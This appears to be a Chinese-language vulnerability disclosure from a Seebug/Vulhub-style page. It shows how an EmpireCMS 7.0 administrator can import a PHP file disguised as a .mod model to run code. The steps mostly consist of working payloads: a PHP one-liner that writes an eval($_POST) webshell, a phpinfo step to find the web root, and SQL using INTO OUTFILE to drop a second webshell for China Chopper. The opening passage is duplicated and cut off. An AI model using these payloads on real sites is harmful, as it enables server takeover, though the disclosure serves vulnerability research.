VULHUB ™

### 简要描述： 帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码。 ### 详细说明： 进入后台~！ 方法一： 系统——数据表与系统模型——管理数据表 再随意选择一个数据表，打开对应数据表的“管理系统模型”如图： [<img src="https://images.seebug.org/upload/201305/0619260893bcba066d29b5e8f965cf7ac184b90e.gif" alt="QQ截图20130506192307.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/0619260893bcba066d29b5e8f965cf7ac184b90e.gif) “导入系统模型”，可进入“LoadInM.php”页面，如图： [<img src="https://images.seebug.org/upload/201305/06192904e930de7657aec67067c11149a17139fc.gif" alt="QQ截图20130506192844.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/06192904e930de7657aec67067c11149a17139fc.gif) 在本地新建一个文件，文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod，导入这个mod文件，即执行里面的php代码，在ecmsmod.php的相同目录下生产x.php的一句话木马文件。 可以从导入系统模型源文件中查看到,如图： [<img src="https://images.seebug.org/upload/201305/06193958a5fb8799012431d90cf9ce01ce79612c.gif" alt="QQ截图20130506193833.gif" width="600"...

### 简要描述： 帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码。 ### 详细说明： 进入后台~！ 方法一： 系统——数据表与系统模型——管理数据表 再随意选择一个数据表，打开对应数据表的“管理系统模型”如图： [<img src="https://images.seebug.org/upload/201305/0619260893bcba066d29b5e8f965cf7ac184b90e.gif" alt="QQ截图20130506192307.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/0619260893bcba066d29b5e8f965cf7ac184b90e.gif) “导入系统模型”，可进入“LoadInM.php”页面，如图： [<img src="https://images.seebug.org/upload/201305/06192904e930de7657aec67067c11149a17139fc.gif" alt="QQ截图20130506192844.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/06192904e930de7657aec67067c11149a17139fc.gif) 在本地新建一个文件，文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod，导入这个mod文件，即执行里面的php代码，在ecmsmod.php的相同目录下生产x.php的一句话木马文件。 可以从导入系统模型源文件中查看到,如图： [<img src="https://images.seebug.org/upload/201305/06193958a5fb8799012431d90cf9ce01ce79612c.gif" alt="QQ截图20130506193833.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/06193958a5fb8799012431d90cf9ce01ce79612c.gif) 方法二： 在本地新建一个info.php（任意php文件）其源码内容为<?php phpinfo();?>，再重名名为info.php.mod，将此文件按照方法一导入系统模型，即可执行info.php.mod的代码并显示在页面上，迅速查看源码即可得知网站根目录的绝对路径,如图： [<img src="https://images.seebug.org/upload/201305/0619483808ba8da9be646e5f6207afc204fedfae.gif" alt="QQ截图20130506194806.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/0619483808ba8da9be646e5f6207afc204fedfae.gif) [<img src="https://images.seebug.org/upload/201305/061951364750ffa516f2dd4ef1c0be4053e57982.gif" alt="QQ截图20130506195011.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/061951364750ffa516f2dd4ef1c0be4053e57982.gif) info.php.mod的源码 然后 系统——备份与恢复数据——执行SQL语句 在执行SQL语句框中输入如下代码： create table temp (cmd text not null); insert into temp (cmd) values('<?php eval($_POST[x])?>'); select cmd from temp into outfile 'c://ecms//z.php'; drop table if exists temp; 即可在网站根目录生成z.php 菜刀连接即可~！ ### 漏洞证明： [<img src="https://images.seebug.org/upload/201305/06194222a423425bd5c52d8ce9872932850d0f6e.gif" alt="QQ截图20130506194214.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/06194222a423425bd5c52d8ce9872932850d0f6e.gif) [<img src="https://images.seebug.org/upload/201305/06200407292ceda410e485d7534d386098c52336.gif" alt="QQ截图20130506200357.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/06200407292ceda410e485d7534d386098c52336.gif)